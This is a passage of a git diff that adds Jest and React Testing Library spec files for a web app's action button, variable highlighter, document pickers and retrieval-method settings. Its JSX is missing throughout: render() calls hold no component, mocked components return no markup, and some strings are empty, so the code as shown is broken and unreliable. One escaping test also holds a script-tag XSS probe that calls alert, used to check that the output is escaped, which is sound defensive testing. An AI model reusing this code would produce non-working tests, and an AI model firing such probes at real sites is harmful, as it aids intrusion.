expect(screen.getByTestId('edit-icon')).toBeInTheDocument() + expect(screen.queryByTestId('add-icon')).toBeNull() + expect(screen.getByText(actionName)).toBeInTheDocument() + }) + }) + + // Click handling + describe('Interactions', () => { + it('should execute click handler when button is clicked', () => { + // Arrange + const onClick = jest.fn() + render() + + // Act + fireEvent.click(screen.getByText('common.operation.add')) + + // Assert + expect(onClick).toHaveBeenCalledTimes(1) + }) + }) +}) diff --git a/web/app/components/app/configuration/base/var-highlight/index.spec.tsx b/web/app/components/app/configuration/base/var-highlight/index.spec.tsx new file mode 100644 index 0000000000..9e84aa09ac --- /dev/null +++ b/web/app/components/app/configuration/base/var-highlight/index.spec.tsx @@ -0,0 +1,62 @@ +import { render, screen } from '@testing-library/react' +import VarHighlight, { varHighlightHTML } from './index' + +describe('VarHighlight', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + // Rendering highlighted variable tags + describe('Rendering', () => { + it('should render braces around the variable name with default styles', () => { + // Arrange + const props = { name: 'userInput' } + + // Act + const { container } = render() + + // Assert + expect(screen.getByText('userInput')).toBeInTheDocument() + expect(screen.getAllByText('{{')[0]).toBeInTheDocument() + expect(screen.getAllByText('}}')[0]).toBeInTheDocument() + expect(container.firstChild).toHaveClass('item') + }) + + it('should apply custom class names when provided', () => { + // Arrange + const props = { name: 'custom', className: 'mt-2' } + + // Act + const { container } = render() + + // Assert + expect(container.firstChild).toHaveClass('mt-2') + }) + }) + + // Escaping HTML via helper + describe('varHighlightHTML', () => { + it('should escape dangerous characters before returning HTML string', () => { + // Arrange + const props = { name: '' } + + // Act + const html = varHighlightHTML(props) + + // Assert + expect(html).toContain('<script>alert('xss')</script>') + expect(html).not.toContain('' + renderComponent({ + value: { + name: specialName, + extension: 'txt', + chunkingMode: ChunkingMode.text, + }, + }) + + // React should escape the text + expect(screen.getByText(specialName)).toBeInTheDocument() + }) + + it('should handle documents with missing extension in data_source_detail_dict', () => { + const docWithEmptyExtension = createMockDocument({ + id: 'doc-empty-ext', + name: 'Doc Empty Ext', + data_source_detail_dict: { + upload_file: { + name: 'file-no-ext', + extension: '', + }, + }, + }) + mockDocumentListData = { data: [docWithEmptyExtension] } + + // Component should handle mapping documents with empty extension + renderComponent() + + // Should not crash + expect(screen.getByTestId('portal-elem')).toBeInTheDocument() + }) + + it('should handle document list mapping with various data_source_detail_dict states', () => { + // Test the mapping logic: d.data_source_detail_dict?.upload_file?.extension || '' + const docs = [ + createMockDocument({ + id: 'doc-1', + name: 'With Extension', + data_source_detail_dict: { + upload_file: { name: 'file.pdf', extension: 'pdf' }, + }, + }), + createMockDocument({ + id: 'doc-2', + name: 'Without Detail Dict', + data_source_detail_dict: undefined, + }), + ] + mockDocumentListData = { data: docs } + + renderComponent() + + // Should not crash during mapping + expect(screen.getByTestId('portal-elem')).toBeInTheDocument() + }) + }) + + // Tests for all prop variations + describe('Prop Variations', () => { + describe('datasetId variations', () => { + it('should handle empty datasetId', () => { + renderComponent({ datasetId: '' }) + + expect(screen.getByTestId('portal-elem')).toBeInTheDocument() + }) + + it('should handle UUID format datasetId', () => { + renderComponent({ datasetId: '123e4567-e89b-12d3-a456-426614174000' }) + + expect(screen.getByTestId('portal-elem')).toBeInTheDocument() + }) + }) + + describe('value.chunkingMode variations', () => { + const chunkingModes = [ + { mode: ChunkingMode.text, label: 'dataset.chunkingMode.general' }, + { mode: ChunkingMode.qa, label: 'dataset.chunkingMode.qa' }, + { mode: ChunkingMode.parentChild, label: 'dataset.chunkingMode.parentChild' }, + ] + + test.each(chunkingModes)( + 'should display correct label for $mode mode', + ({ mode, label }) => { + renderComponent({ + value: { + name: 'Test', + extension: 'txt', + chunkingMode: mode, + parentMode: mode === ChunkingMode.parentChild ? 'paragraph' : undefined, + }, + }) + + expect(screen.getByText(new RegExp(label))).toBeInTheDocument() + }, + ) + }) + + describe('value.parentMode variations', () => { + const parentModes: Array<{ mode: ParentMode; label: string }> = [ + { mode: 'paragraph', label: 'dataset.parentMode.paragraph' }, + { mode: 'full-doc', label: 'dataset.parentMode.fullDoc' }, + ] + + test.each(parentModes)( + 'should display correct label for $mode parentMode', + ({ mode, label }) => { + renderComponent({ + value: { + name: 'Test', + extension: 'txt', + chunkingMode: ChunkingMode.parentChild, + parentMode: mode, + }, + }) + + expect(screen.getByText(new RegExp(label))).toBeInTheDocument() + }, + ) + }) + + describe('value.extension variations', () => { + const extensions = ['txt', 'pdf', 'docx', 'xlsx', 'csv', 'md', 'html'] + + test.each(extensions)('should handle %s extension', (ext) => { + renderComponent({ + value: { + name: `File.${ext}`, + extension: ext, + chunkingMode: ChunkingMode.text, + }, + }) + + expect(screen.getByText(`File.${ext}`)).toBeInTheDocument() + }) + }) + }) + + // Tests for document selection + describe('Document Selection', () => { + it('should fetch documents list via useDocumentList', () => { + const mockDoc = createMockDocument({ + id: 'selected-doc', + name: 'Selected Document', + }) + mockDocumentListData = { data: [mockDoc] } + const onChange = jest.fn() + + renderComponent({ onChange }) + + // Verify the hook was called + const { useDocumentList } = jest.requireMock('@/service/knowledge/use-document') + expect(useDocumentList).toHaveBeenCalled() + }) + + it('should call onChange when document is selected', () => { + const docs = createMockDocumentList(3) + mockDocumentListData = { data: docs } + const onChange = jest.fn() + + renderComponent({ onChange }) + + // Click on a document in the list + fireEvent.click(screen.getByText('Document 2')) + + // handleChange should find the document and call onChange with full document + expect(onChange).toHaveBeenCalledTimes(1) + expect(onChange).toHaveBeenCalledWith(docs[1]) + }) + + it('should map document list items correctly', () => { + const docs = createMockDocumentList(3) + mockDocumentListData = { data: docs } + + renderComponent() + + // Documents should be rendered in the list + expect(screen.getByText('Document 1')).toBeInTheDocument() + expect(screen.getByText('Document 2')).toBeInTheDocument() + expect(screen.getByText('Document 3')).toBeInTheDocument() + }) + }) + + // Tests for integration with child components + describe('Child Component Integration', () => { + it('should pass correct data to DocumentList when popup is open', () => { + const docs = createMockDocumentList(3) + mockDocumentListData = { data: docs } + + renderComponent() + + // DocumentList receives mapped documents: { id, name, extension } + // We verify the data is fetched + const { useDocumentList } = jest.requireMock('@/service/knowledge/use-document') + expect(useDocumentList).toHaveBeenCalled() + }) + + it('should map document data_source_detail_dict extension correctly', () => { + const doc = createMockDocument({ + id: 'mapped-doc', + name: 'Mapped Document', + data_source_detail_dict: { + upload_file: { + name: 'mapped.pdf', + extension: 'pdf', + }, + }, + }) + mockDocumentListData = { data: [doc] } + + renderComponent() + + // The mapping: d.data_source_detail_dict?.upload_file?.extension || '' + // Should extract 'pdf' from the document + expect(screen.getByTestId('portal-elem')).toBeInTheDocument() + }) + + it('should render trigger with SearchInput integration', () => { + renderComponent() + + // The trigger is always rendered + expect(screen.getByTestId('portal-trigger')).toBeInTheDocument() + }) + + it('should integrate FileIcon component', () => { + // Use empty document list to avoid duplicate icons from list + mockDocumentListData = { data: [] } + + renderComponent({ + value: { + name: 'test.pdf', + extension: 'pdf', + chunkingMode: ChunkingMode.text, + }, + }) + + // FileIcon should be rendered via DocumentFileIcon - pdf renders pdf icon + expect(screen.getByTestId('file-pdf-icon')).toBeInTheDocument() + }) + }) + + // Tests for visual states + describe('Visual States', () => { + it('should apply hover styles on trigger', () => { + renderComponent() + + const trigger = screen.getByTestId('portal-trigger') + const clickableDiv = trigger.querySelector('div') + + expect(clickableDiv).toHaveClass('hover:bg-state-base-hover') + }) + + it('should render portal content for document selection', () => { + renderComponent() + + // Portal content is rendered in our mock for testing + expect(screen.getByTestId('portal-content')).toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/datasets/common/document-picker/preview-document-picker.spec.tsx b/web/app/components/datasets/common/document-picker/preview-document-picker.spec.tsx new file mode 100644 index 0000000000..e6900d23db --- /dev/null +++ b/web/app/components/datasets/common/document-picker/preview-document-picker.spec.tsx @@ -0,0 +1,641 @@ +import React from 'react' +import { fireEvent, render, screen } from '@testing-library/react' +import type { DocumentItem } from '@/models/datasets' +import PreviewDocumentPicker from './preview-document-picker' + +// Mock react-i18next +jest.mock('react-i18next', () => ({ + useTranslation: () => ({ + t: (key: string, params?: Record) => { + if (key === 'dataset.preprocessDocument' && params?.num) + return `${params.num} files` + + return key + }, + }), +})) + +// Mock portal-to-follow-elem - always render content for testing +jest.mock('@/app/components/base/portal-to-follow-elem', () => ({ + PortalToFollowElem: ({ children, open }: { + children: React.ReactNode + open?: boolean + }) => ( +
+ {children} +
+ ), + PortalToFollowElemTrigger: ({ children, onClick }: { + children: React.ReactNode + onClick?: () => void + }) => ( +
+ {children} +
+ ), + // Always render content to allow testing document selection + PortalToFollowElemContent: ({ children, className }: { + children: React.ReactNode + className?: string + }) => ( +
+ {children} +
+ ), +})) + +// Mock icons +jest.mock('@remixicon/react', () => ({ + RiArrowDownSLine: () => , + RiFile3Fill: () => 📄, + RiFileCodeFill: () => 📄, + RiFileExcelFill: () => 📄, + RiFileGifFill: () => 📄, + RiFileImageFill: () => 📄, + RiFileMusicFill: () => 📄, + RiFilePdf2Fill: () => 📄, + RiFilePpt2Fill: () => 📄, + RiFileTextFill: () => 📄, + RiFileVideoFill: () => 📄, + RiFileWordFill: () => 📄, + RiMarkdownFill: () => 📄, +})) + +// Factory function to create mock DocumentItem +const createMockDocumentItem = (overrides: Partial = {}): DocumentItem => ({ + id: `doc-${Math.random().toString(36).substr(2, 9)}`, + name: 'Test Document', + extension: 'txt', + ...overrides, +}) + +// Factory function to create multiple document items +const createMockDocumentList = (count: number): DocumentItem[] => { + return Array.from({ length: count }, (_, index) => + createMockDocumentItem({ + id: `doc-${index + 1}`, + name: `Document ${index + 1}`, + extension: index % 2 === 0 ? 'pdf' : 'txt', + }), + ) +} + +// Factory function to create default props +const createDefaultProps = (overrides: Partial> = {}) => ({ + value: createMockDocumentItem({ id: 'selected-doc', name: 'Selected Document' }), + files: createMockDocumentList(3), + onChange: jest.fn(), + ...overrides, +}) + +// Helper to render component with default props +const renderComponent = (props: Partial> = {}) => { + const defaultProps = createDefaultProps(props) + return { + ...render(), + props: defaultProps, + } +} + +describe('PreviewDocumentPicker', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + // Tests for basic rendering + describe('Rendering', () => { + it('should render without crashing', () => { + renderComponent() + + expect(screen.getByTestId('portal-elem')).toBeInTheDocument() + }) + + it('should render document name from value prop', () => { + renderComponent({ + value: createMockDocumentItem({ name: 'My Document' }), + }) + + expect(screen.getByText('My Document')).toBeInTheDocument() + }) + + it('should render placeholder when name is empty', () => { + renderComponent({ + value: createMockDocumentItem({ name: '' }), + }) + + expect(screen.getByText('--')).toBeInTheDocument() + }) + + it('should render placeholder when name is undefined', () => { + renderComponent({ + value: { id: 'doc-1', extension: 'txt' } as DocumentItem, + }) + + expect(screen.getByText('--')).toBeInTheDocument() + }) + + it('should render arrow icon', () => { + renderComponent() + + expect(screen.getByTestId('arrow-icon')).toBeInTheDocument() + }) + + it('should render file icon', () => { + renderComponent({ + value: createMockDocumentItem({ extension: 'txt' }), + files: [], // Use empty files to avoid duplicate icons + }) + + expect(screen.getByTestId('file-text-icon')).toBeInTheDocument() + }) + + it('should render pdf icon for pdf extension', () => { + renderComponent({ + value: createMockDocumentItem({ extension: 'pdf' }), + files: [], // Use empty files to avoid duplicate icons + }) + + expect(screen.getByTestId('file-pdf-icon')).toBeInTheDocument() + }) + }) + + // Tests for props handling + describe('Props', () => { + it('should accept required props', () => { + const props = createDefaultProps() + render() + + expect(screen.getByTestId('portal-elem')).toBeInTheDocument() + }) + + it('should apply className to trigger element', () => { + renderComponent({ className: 'custom-class' }) + + const trigger = screen.getByTestId('portal-trigger') + const innerDiv = trigger.querySelector('.custom-class') + expect(innerDiv).toBeInTheDocument() + }) + + it('should handle empty files array', () => { + // Component should render without crashing with empty files + renderComponent({ files: [] }) + + expect(screen.getByTestId('portal-elem')).toBeInTheDocument() + }) + + it('should handle single file', () => { + // Component should accept single file + renderComponent({ + files: [createMockDocumentItem({ id: 'single-doc', name: 'Single File' })], + }) + + expect(screen.getByTestId('portal-elem')).toBeInTheDocument() + }) + + it('should handle multiple files', () => { + // Component should accept multiple files + renderComponent({ + files: createMockDocumentList(5), + }) + + expect(screen.getByTestId('portal-elem')).toBeInTheDocument() + }) + + it('should use value.extension for file icon', () => { + renderComponent({ + value: createMockDocumentItem({ name: 'test.docx', extension: 'docx' }), + }) + + expect(screen.getByTestId('file-word-icon')).toBeInTheDocument() + }) + }) + + // Tests for state management + describe('State Management', () => { + it('should initialize with popup closed', () => { + renderComponent() + + expect(screen.getByTestId('portal-elem')).toHaveAttribute('data-open', 'false') + }) + + it('should toggle popup when trigger is clicked', () => { + renderComponent() + + const trigger = screen.getByTestId('portal-trigger') + fireEvent.click(trigger) + + expect(trigger).toBeInTheDocument() + }) + + it('should render portal content for document selection', () => { + renderComponent() + + // Portal content is always rendered in our mock for testing + expect(screen.getByTestId('portal-content')).toBeInTheDocument() + }) + }) + + // Tests for callback stability and memoization + describe('Callback Stability', () => { + it('should maintain stable onChange callback when value changes', () => { + const onChange = jest.fn() + const value1 = createMockDocumentItem({ id: 'doc-1', name: 'Doc 1' }) + const value2 = createMockDocumentItem({ id: 'doc-2', name: 'Doc 2' }) + + const { rerender } = render( + , + ) + + rerender( + , + ) + + expect(screen.getByText('Doc 2')).toBeInTheDocument() + }) + + it('should use updated onChange callback after rerender', () => { + const onChange1 = jest.fn() + const onChange2 = jest.fn() + const value = createMockDocumentItem() + const files = createMockDocumentList(3) + + const { rerender } = render( + , + ) + + rerender( + , + ) + + expect(screen.getByTestId('portal-elem')).toBeInTheDocument() + }) + }) + + // Tests for component memoization + describe('Component Memoization', () => { + it('should be wrapped with React.memo', () => { + expect((PreviewDocumentPicker as any).$$typeof).toBeDefined() + }) + + it('should not re-render when props are the same', () => { + const onChange = jest.fn() + const value = createMockDocumentItem() + const files = createMockDocumentList(3) + + const { rerender } = render( + , + ) + + rerender( + , + ) + + expect(screen.getByTestId('portal-elem')).toBeInTheDocument() + }) + }) + + // Tests for user interactions + describe('User Interactions', () => { + it('should toggle popup when trigger is clicked', () => { + renderComponent() + + const trigger = screen.getByTestId('portal-trigger') + fireEvent.click(trigger) + + expect(trigger).toBeInTheDocument() + }) + + it('should render document list with files', () => { + const files = createMockDocumentList(3) + renderComponent({ files }) + + // Documents should be visible in the list + expect(screen.getByText('Document 1')).toBeInTheDocument() + expect(screen.getByText('Document 2')).toBeInTheDocument() + expect(screen.getByText('Document 3')).toBeInTheDocument() + }) + + it('should call onChange when document is selected', () => { + const onChange = jest.fn() + const files = createMockDocumentList(3) + + renderComponent({ files, onChange }) + + // Click on a document + fireEvent.click(screen.getByText('Document 2')) + + // handleChange should call onChange with the selected item + expect(onChange).toHaveBeenCalledTimes(1) + expect(onChange).toHaveBeenCalledWith(files[1]) + }) + + it('should handle rapid toggle clicks', () => { + renderComponent() + + const trigger = screen.getByTestId('portal-trigger') + + // Rapid clicks + fireEvent.click(trigger) + fireEvent.click(trigger) + fireEvent.click(trigger) + fireEvent.click(trigger) + + expect(trigger).toBeInTheDocument() + }) + }) + + // Tests for edge cases + describe('Edge Cases', () => { + it('should handle null value properties gracefully', () => { + renderComponent({ + value: { id: 'doc-1', name: '', extension: '' }, + }) + + expect(screen.getByText('--')).toBeInTheDocument() + }) + + it('should handle empty files array', () => { + renderComponent({ files: [] }) + + // Component should render without crashing + expect(screen.getByTestId('portal-elem')).toBeInTheDocument() + }) + + it('should handle very long document names', () => { + const longName = 'A'.repeat(500) + renderComponent({ + value: createMockDocumentItem({ name: longName }), + }) + + expect(screen.getByText(longName)).toBeInTheDocument() + }) + + it('should handle special characters in document name', () => { + const specialName = '' + renderComponent({ + value: createMockDocumentItem({ name: specialName }), + }) + + expect(screen.getByText(specialName)).toBeInTheDocument() + }) + + it('should handle undefined files prop', () => { + // Test edge case where files might be undefined at runtime + const props = createDefaultProps() + // @ts-expect-error - Testing runtime edge case + props.files = undefined + + render() + + // Component should render without crashing + expect(screen.getByTestId('portal-elem')).toBeInTheDocument() + }) + + it('should handle large number of files', () => { + const manyFiles = createMockDocumentList(100) + renderComponent({ files: manyFiles }) + + // Component should accept large files array + expect(screen.getByTestId('portal-elem')).toBeInTheDocument() + }) + + it('should handle files with same name but different extensions', () => { + const files = [ + createMockDocumentItem({ id: 'doc-1', name: 'document', extension: 'pdf' }), + createMockDocumentItem({ id: 'doc-2', name: 'document', extension: 'txt' }), + ] + renderComponent({ files }) + + // Component should handle duplicate names + expect(screen.getByTestId('portal-elem')).toBeInTheDocument() + }) + }) + + // Tests for prop variations + describe('Prop Variations', () => { + describe('value variations', () => { + it('should handle value with all fields', () => { + renderComponent({ + value: { + id: 'full-doc', + name: 'Full Document', + extension: 'pdf', + }, + }) + + expect(screen.getByText('Full Document')).toBeInTheDocument() + }) + + it('should handle value with minimal fields', () => { + renderComponent({ + value: { id: 'minimal', name: '', extension: '' }, + }) + + expect(screen.getByText('--')).toBeInTheDocument() + }) + }) + + describe('files variations', () => { + it('should handle single file', () => { + renderComponent({ + files: [createMockDocumentItem({ name: 'Single' })], + }) + + expect(screen.getByTestId('portal-elem')).toBeInTheDocument() + }) + + it('should handle two files', () => { + renderComponent({ + files: createMockDocumentList(2), + }) + + expect(screen.getByTestId('portal-elem')).toBeInTheDocument() + }) + + it('should handle many files', () => { + renderComponent({ + files: createMockDocumentList(50), + }) + + expect(screen.getByTestId('portal-elem')).toBeInTheDocument() + }) + }) + + describe('className variations', () => { + it('should apply custom className', () => { + renderComponent({ className: 'my-custom-class' }) + + const trigger = screen.getByTestId('portal-trigger') + expect(trigger.querySelector('.my-custom-class')).toBeInTheDocument() + }) + + it('should work without className', () => { + renderComponent({ className: undefined }) + + expect(screen.getByTestId('portal-trigger')).toBeInTheDocument() + }) + + it('should handle multiple class names', () => { + renderComponent({ className: 'class-one class-two' }) + + const trigger = screen.getByTestId('portal-trigger') + const element = trigger.querySelector('.class-one') + expect(element).toBeInTheDocument() + expect(element).toHaveClass('class-two') + }) + }) + + describe('extension variations', () => { + const extensions = [ + { ext: 'txt', icon: 'file-text-icon' }, + { ext: 'pdf', icon: 'file-pdf-icon' }, + { ext: 'docx', icon: 'file-word-icon' }, + { ext: 'xlsx', icon: 'file-excel-icon' }, + { ext: 'md', icon: 'file-markdown-icon' }, + ] + + test.each(extensions)('should render correct icon for $ext extension', ({ ext, icon }) => { + renderComponent({ + value: createMockDocumentItem({ extension: ext }), + files: [], // Use empty files to avoid duplicate icons + }) + + expect(screen.getByTestId(icon)).toBeInTheDocument() + }) + }) + }) + + // Tests for document list rendering + describe('Document List Rendering', () => { + it('should render all documents in the list', () => { + const files = createMockDocumentList(5) + renderComponent({ files }) + + // All documents should be visible + files.forEach((file) => { + expect(screen.getByText(file.name)).toBeInTheDocument() + }) + }) + + it('should pass onChange handler to DocumentList', () => { + const onChange = jest.fn() + const files = createMockDocumentList(3) + + renderComponent({ files, onChange }) + + // Click on first document + fireEvent.click(screen.getByText('Document 1')) + + expect(onChange).toHaveBeenCalledWith(files[0]) + }) + + it('should show count header only for multiple files', () => { + // Single file - no header + const { rerender } = render( + , + ) + expect(screen.queryByText(/files/)).not.toBeInTheDocument() + + // Multiple files - show header + rerender( + , + ) + expect(screen.getByText('3 files')).toBeInTheDocument() + }) + }) + + // Tests for visual states + describe('Visual States', () => { + it('should apply hover styles on trigger', () => { + renderComponent() + + const trigger = screen.getByTestId('portal-trigger') + const innerDiv = trigger.querySelector('.hover\\:bg-state-base-hover') + expect(innerDiv).toBeInTheDocument() + }) + + it('should have truncate class for long names', () => { + renderComponent({ + value: createMockDocumentItem({ name: 'Very Long Document Name' }), + }) + + const nameElement = screen.getByText('Very Long Document Name') + expect(nameElement).toHaveClass('truncate') + }) + + it('should have max-width on name element', () => { + renderComponent({ + value: createMockDocumentItem({ name: 'Test' }), + }) + + const nameElement = screen.getByText('Test') + expect(nameElement).toHaveClass('max-w-[200px]') + }) + }) + + // Tests for handleChange callback + describe('handleChange Callback', () => { + it('should call onChange with selected document item', () => { + const onChange = jest.fn() + const files = createMockDocumentList(3) + + renderComponent({ files, onChange }) + + // Click first document + fireEvent.click(screen.getByText('Document 1')) + + expect(onChange).toHaveBeenCalledWith(files[0]) + }) + + it('should handle different document items in files', () => { + const onChange = jest.fn() + const customFiles = [ + { id: 'custom-1', name: 'Custom File 1', extension: 'pdf' }, + { id: 'custom-2', name: 'Custom File 2', extension: 'txt' }, + ] + + renderComponent({ files: customFiles, onChange }) + + // Click on first custom file + fireEvent.click(screen.getByText('Custom File 1')) + expect(onChange).toHaveBeenCalledWith(customFiles[0]) + + // Click on second custom file + fireEvent.click(screen.getByText('Custom File 2')) + expect(onChange).toHaveBeenCalledWith(customFiles[1]) + }) + + it('should work with multiple sequential selections', () => { + const onChange = jest.fn() + const files = createMockDocumentList(3) + + renderComponent({ files, onChange }) + + // Select multiple documents sequentially + fireEvent.click(screen.getByText('Document 1')) + fireEvent.click(screen.getByText('Document 3')) + fireEvent.click(screen.getByText('Document 2')) + + expect(onChange).toHaveBeenCalledTimes(3) + expect(onChange).toHaveBeenNthCalledWith(1, files[0]) + expect(onChange).toHaveBeenNthCalledWith(2, files[2]) + expect(onChange).toHaveBeenNthCalledWith(3, files[1]) + }) + }) +}) diff --git a/web/app/components/datasets/common/retrieval-method-config/index.spec.tsx b/web/app/components/datasets/common/retrieval-method-config/index.spec.tsx new file mode 100644 index 0000000000..be509f1c6e --- /dev/null +++ b/web/app/components/datasets/common/retrieval-method-config/index.spec.tsx @@ -0,0 +1,912 @@ +import React from 'react' +import { fireEvent, render, screen } from '@testing-library/react' +import type { RetrievalConfig } from '@/types/app' +import { RETRIEVE_METHOD } from '@/types/app' +import { + DEFAULT_WEIGHTED_SCORE, + RerankingModeEnum, + WeightedScoreEnum, +} from '@/models/datasets' +import RetrievalMethodConfig from './index' + +// Mock react-i18next +jest.mock('react-i18next', () => ({ + useTranslation: () => ({ + t: (key: string) => key, + }), +})) + +// Mock provider context with controllable supportRetrievalMethods +let mockSupportRetrievalMethods: RETRIEVE_METHOD[] = [ + RETRIEVE_METHOD.semantic, + RETRIEVE_METHOD.fullText, + RETRIEVE_METHOD.hybrid, +] + +jest.mock('@/context/provider-context', () => ({ + useProviderContext: () => ({ + supportRetrievalMethods: mockSupportRetrievalMethods, + }), +})) + +// Mock model hooks with controllable return values +let mockRerankDefaultModel: { provider: { provider: string }; model: string } | undefined = { + provider: { provider: 'test-provider' }, + model: 'test-rerank-model', +} +let mockIsRerankDefaultModelValid: boolean | undefined = true + +jest.mock('@/app/components/header/account-setting/model-provider-page/hooks', () => ({ + useModelListAndDefaultModelAndCurrentProviderAndModel: () => ({ + defaultModel: mockRerankDefaultModel, + currentModel: mockIsRerankDefaultModelValid, + }), +})) + +// Mock child component RetrievalParamConfig to simplify testing +jest.mock('../retrieval-param-config', () => ({ + __esModule: true, + default: ({ type, value, onChange, showMultiModalTip }: { + type: RETRIEVE_METHOD + value: RetrievalConfig + onChange: (v: RetrievalConfig) => void + showMultiModalTip?: boolean + }) => ( +
+ {type} + {String(showMultiModalTip)} + +
+ ), +})) + +// Factory function to create mock RetrievalConfig +const createMockRetrievalConfig = (overrides: Partial = {}): RetrievalConfig => ({ + search_method: RETRIEVE_METHOD.semantic, + reranking_enable: false, + reranking_model: { + reranking_provider_name: '', + reranking_model_name: '', + }, + top_k: 4, + score_threshold_enabled: false, + score_threshold: 0.5, + ...overrides, +}) + +// Helper to render component with default props +const renderComponent = (props: Partial> = {}) => { + const defaultProps = { + value: createMockRetrievalConfig(), + onChange: jest.fn(), + } + return render() +} + +describe('RetrievalMethodConfig', () => { + beforeEach(() => { + jest.clearAllMocks() + // Reset mock values to defaults + mockSupportRetrievalMethods = [ + RETRIEVE_METHOD.semantic, + RETRIEVE_METHOD.fullText, + RETRIEVE_METHOD.hybrid, + ] + mockRerankDefaultModel = { + provider: { provider: 'test-provider' }, + model: 'test-rerank-model', + } + mockIsRerankDefaultModelValid = true + }) + + // Tests for basic rendering + describe('Rendering', () => { + it('should render without crashing', () => { + renderComponent() + + expect(screen.getByText('dataset.retrieval.semantic_search.title')).toBeInTheDocument() + }) + + it('should render all three retrieval methods when all are supported', () => { + renderComponent() + + expect(screen.getByText('dataset.retrieval.semantic_search.title')).toBeInTheDocument() + expect(screen.getByText('dataset.retrieval.full_text_search.title')).toBeInTheDocument() + expect(screen.getByText('dataset.retrieval.hybrid_search.title')).toBeInTheDocument() + }) + + it('should render descriptions for all retrieval methods', () => { + renderComponent() + + expect(screen.getByText('dataset.retrieval.semantic_search.description')).toBeInTheDocument() + expect(screen.getByText('dataset.retrieval.full_text_search.description')).toBeInTheDocument() + expect(screen.getByText('dataset.retrieval.hybrid_search.description')).toBeInTheDocument() + }) + + it('should only render semantic search when only semantic is supported', () => { + mockSupportRetrievalMethods = [RETRIEVE_METHOD.semantic] + renderComponent() + + expect(screen.getByText('dataset.retrieval.semantic_search.title')).toBeInTheDocument() + expect(screen.queryByText('dataset.retrieval.full_text_search.title')).not.toBeInTheDocument() + expect(screen.queryByText('dataset.retrieval.hybrid_search.title')).not.toBeInTheDocument() + }) + + it('should only render fullText search when only fullText is supported', () => { + mockSupportRetrievalMethods = [RETRIEVE_METHOD.fullText] + renderComponent() + + expect(screen.queryByText('dataset.retrieval.semantic_search.title')).not.toBeInTheDocument() + expect(screen.getByText('dataset.retrieval.full_text_search.title')).toBeInTheDocument() + expect(screen.queryByText('dataset.retrieval.hybrid_search.title')).not.toBeInTheDocument() + }) + + it('should only render hybrid search when only hybrid is supported', () => { + mockSupportRetrievalMethods = [RETRIEVE_METHOD.hybrid] + renderComponent() + + expect(screen.queryByText('dataset.retrieval.semantic_search.title')).not.toBeInTheDocument() + expect(screen.queryByText('dataset.retrieval.full_text_search.title')).not.toBeInTheDocument() + expect(screen.getByText('dataset.retrieval.hybrid_search.title')).toBeInTheDocument() + }) + + it('should render nothing when no retrieval methods are supported', () => { + mockSupportRetrievalMethods = [] + const { container } = renderComponent() + + // Only the wrapper div should exist + expect(container.firstChild?.childNodes.length).toBe(0) + }) + + it('should show RetrievalParamConfig for the active method', () => { + renderComponent({ + value: createMockRetrievalConfig({ search_method: RETRIEVE_METHOD.semantic }), + }) + + expect(screen.getByTestId('retrieval-param-config-semantic_search')).toBeInTheDocument() + expect(screen.queryByTestId('retrieval-param-config-full_text_search')).not.toBeInTheDocument() + expect(screen.queryByTestId('retrieval-param-config-hybrid_search')).not.toBeInTheDocument() + }) + + it('should show RetrievalParamConfig for fullText when active', () => { + renderComponent({ + value: createMockRetrievalConfig({ search_method: RETRIEVE_METHOD.fullText }), + }) + + expect(screen.queryByTestId('retrieval-param-config-semantic_search')).not.toBeInTheDocument() + expect(screen.getByTestId('retrieval-param-config-full_text_search')).toBeInTheDocument() + expect(screen.queryByTestId('retrieval-param-config-hybrid_search')).not.toBeInTheDocument() + }) + + it('should show RetrievalParamConfig for hybrid when active', () => { + renderComponent({ + value: createMockRetrievalConfig({ search_method: RETRIEVE_METHOD.hybrid }), + }) + + expect(screen.queryByTestId('retrieval-param-config-semantic_search')).not.toBeInTheDocument() + expect(screen.queryByTestId('retrieval-param-config-full_text_search')).not.toBeInTheDocument() + expect(screen.getByTestId('retrieval-param-config-hybrid_search')).toBeInTheDocument() + }) + }) + + // Tests for props handling + describe('Props', () => { + it('should pass showMultiModalTip to RetrievalParamConfig', () => { + renderComponent({ + value: createMockRetrievalConfig({ search_method: RETRIEVE_METHOD.semantic }), + showMultiModalTip: true, + }) + + expect(screen.getByTestId('param-config-multimodal-tip')).toHaveTextContent('true') + }) + + it('should default showMultiModalTip to false', () => { + renderComponent({ + value: createMockRetrievalConfig({ search_method: RETRIEVE_METHOD.semantic }), + }) + + expect(screen.getByTestId('param-config-multimodal-tip')).toHaveTextContent('false') + }) + + it('should apply disabled state to option cards', () => { + renderComponent({ disabled: true }) + + // When disabled, clicking should not trigger onChange + const semanticOption = screen.getByText('dataset.retrieval.semantic_search.title').closest('div[class*="cursor"]') + expect(semanticOption).toHaveClass('cursor-not-allowed') + }) + + it('should default disabled to false', () => { + renderComponent() + + const semanticOption = screen.getByText('dataset.retrieval.semantic_search.title').closest('div[class*="cursor"]') + expect(semanticOption).not.toHaveClass('cursor-not-allowed') + }) + }) + + // Tests for user interactions and event handlers + describe('User Interactions', () => { + it('should call onChange when switching to semantic search', () => { + const onChange = jest.fn() + renderComponent({ + value: createMockRetrievalConfig({ search_method: RETRIEVE_METHOD.fullText }), + onChange, + }) + + const semanticOption = screen.getByText('dataset.retrieval.semantic_search.title').closest('div[class*="cursor-pointer"]') + fireEvent.click(semanticOption!) + + expect(onChange).toHaveBeenCalledTimes(1) + expect(onChange).toHaveBeenCalledWith( + expect.objectContaining({ + search_method: RETRIEVE_METHOD.semantic, + reranking_enable: true, + }), + ) + }) + + it('should call onChange when switching to fullText search', () => { + const onChange = jest.fn() + renderComponent({ + value: createMockRetrievalConfig({ search_method: RETRIEVE_METHOD.semantic }), + onChange, + }) + + const fullTextOption = screen.getByText('dataset.retrieval.full_text_search.title').closest('div[class*="cursor-pointer"]') + fireEvent.click(fullTextOption!) + + expect(onChange).toHaveBeenCalledTimes(1) + expect(onChange).toHaveBeenCalledWith( + expect.objectContaining({ + search_method: RETRIEVE_METHOD.fullText, + reranking_enable: true, + }), + ) + }) + + it('should call onChange when switching to hybrid search', () => { + const onChange = jest.fn() + renderComponent({ + value: createMockRetrievalConfig({ search_method: RETRIEVE_METHOD.semantic }), + onChange, + }) + + const hybridOption = screen.getByText('dataset.retrieval.hybrid_search.title').closest('div[class*="cursor-pointer"]') + fireEvent.click(hybridOption!) + + expect(onChange).toHaveBeenCalledTimes(1) + expect(onChange).toHaveBeenCalledWith( + expect.objectContaining({ + search_method: 